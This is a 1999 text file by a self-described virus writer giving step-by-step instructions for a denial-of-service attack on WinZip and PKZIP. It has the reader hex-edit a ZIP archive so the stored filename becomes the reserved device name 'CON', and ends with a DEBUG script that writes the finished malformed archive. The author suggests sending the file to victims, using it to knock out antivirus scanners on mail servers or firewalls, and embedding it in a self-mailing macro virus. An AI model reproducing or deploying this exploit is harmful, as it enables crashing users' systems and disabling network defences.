
                           WinZip DOS Attack

                               by Rajaat
                       Written in December, 1999


Intro

  You might have already guessed that Denial Of Service attack is not
  really my main focus, which is more virus related. I found this trick
  out by accident a few years ago with PKZIP for DOS (the Operating
  System). In the course of years PKWare fixed quite a few holes, that
  mainly had to do with adding a reserved device name as file in a ZIP
  archive. Some of these holes still exist, but the staggering thing I
  discovered that it still works with WinZip and the 32 bit version of
  PKZIP, and that it can crash a Windows 95 system completely.

Purpose

  As "standalone" trick this is not very useful, you can send a modified
  ZIP file to some person and when he attempts to unzip it his whole
  system hangs. Wow, this is impressive (NOT). There are more
  "sophisticated" ways to let a Windows machine crash, so this wouldn't
  be very interesting.

  But wait, there is more. As a virus writer I know that every
  respectable company that wants to be free of virus infestations use
  antivirus software to block viruses from coming in the local network.
  The most logical part to put antivirus measures is at the point where
  most likely a virus will enter the corporation network, and this is at
  the firewall or mail server.

  In order to scan all incoming files, a good antivirus product must
  examine the file type and take proper action on each sort of file. In
  case of a ZIP file, this will most likely to result in the scanner
  unpacking the file in order to scan the contents of the archive. Now
  my guess is that there are quite a few scanners that rely on WinZip or
  some WinZip API in order to unpack archives. My reason for thinking
  this is that AV companies are already busy enough writing good
  algorithms for accurately detecting viruses, they don't want to be
  bothered with writing a decompressor too, so they most probably get a
  license for the WinZip API.

  So my guess it that you can take down a firewall or mailserver that
  runs an antivirus package to monitor incoming traffic. A malformed ZIP
  archive does not need to be very big, and you could embed it for
  example in your (macro) virus, that uses MAPI functions to mail it :-)

  Sorry that I haven't been able to test this out, but it is still worth
  a try, since it is very simple if you have the proper testing software
  at hand (I only had WinZip and PKZIP for Win32, not any antivirus
  tool).

Implementation

  You don't need many tools, all you need is PKZIP for Win32 or WinZip
  (whatever you feel like) and a hex editor (like HIEW). I rather still
  use programs that can be used from a command line, so I use PKZIP for
  Win32 in this example.

  Step 1: Create a file
    Create a file using the 8.3 naming convention, it should have a
    filename of 8 characters and an extension of 3 characters. This is
    important, since we need to change it afterwards and we need it to
    be padded to this size.

    Example:
      ECHO Hello, stinking world! > JIMBATES.ASS

  Step 2: Make a zip file containing the file created in step 1
    I think it would be silly to mention that you can add this file also
    to an already existing archive?

    Example:
      PKZIP -add WINZAP JIMBATES.ASS

  Step 3: Take a hex editor and open the ZIP file in it
    You if you look in the file, you will see the text "JIMBATES.ASS"
    appear twice in the archive. You need to edit them both.
    Overwrite the text
        "JIMBATES.ASS"
    with
        "CON         "
          AND DON'T FORGET THE SPACES, ALSO OVERWRITE THE DOT!

  Step 4: You're ready to go
    Now you have an archive that is pretty malformed, try to unzip it
    and see what happens. Try some antivirus scanners that support
    scanning inside of ZIP files and see what happens.

Conclusion
  I don't know, it needs more testing, for example on the NT platform
  and Windows 98, but I think it is fun to try out and see if it works.

  As bonus a debug dump of the in the example shown is included for the
  ones that cannot handle a hex editor (*sigh*).

n winzap.zip
e 0100  50 4B 03 04 0A 00 00 00 00 00 A9 71 87 27 F8 0C 
e 0110  B4 2E 17 00 00 00 17 00 00 00 0C 00 24 00 43 4F 
e 0120  4E 20 20 20 20 20 20 20 20 20 0A 00 20 00 00 00 
e 0130  00 00 01 00 18 00 00 EB B7 D3 B4 40 BF 01 00 18 
e 0140  55 9F 3D 40 BF 01 E0 75 7F D3 B4 40 BF 01 48 65 
e 0150  6C 6C 6F 2C 20 73 74 69 6E 6B 79 20 77 6F 72 6C 
e 0160  64 21 20 0D 0A 50 4B 01 02 19 00 0A 00 00 00 00 
e 0170  00 A9 71 87 27 F8 0C B4 2E 17 00 00 00 17 00 00 
e 0180  00 0C 00 00 00 00 00 00 00 00 00 20 00 00 00 00 
e 0190  00 00 00 43 4F 4E 20 20 20 20 20 20 20 20 20 50 
e 01A0  4B 05 06 00 00 00 00 01 00 01 00 3A 00 00 00 65 
e 01B0  00 00 00 00 00 
rcx
00B5
w
q